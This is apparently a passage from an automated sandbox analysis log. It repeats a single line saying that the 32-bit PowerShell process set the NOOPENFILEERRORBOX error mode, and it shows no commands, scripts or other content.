          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
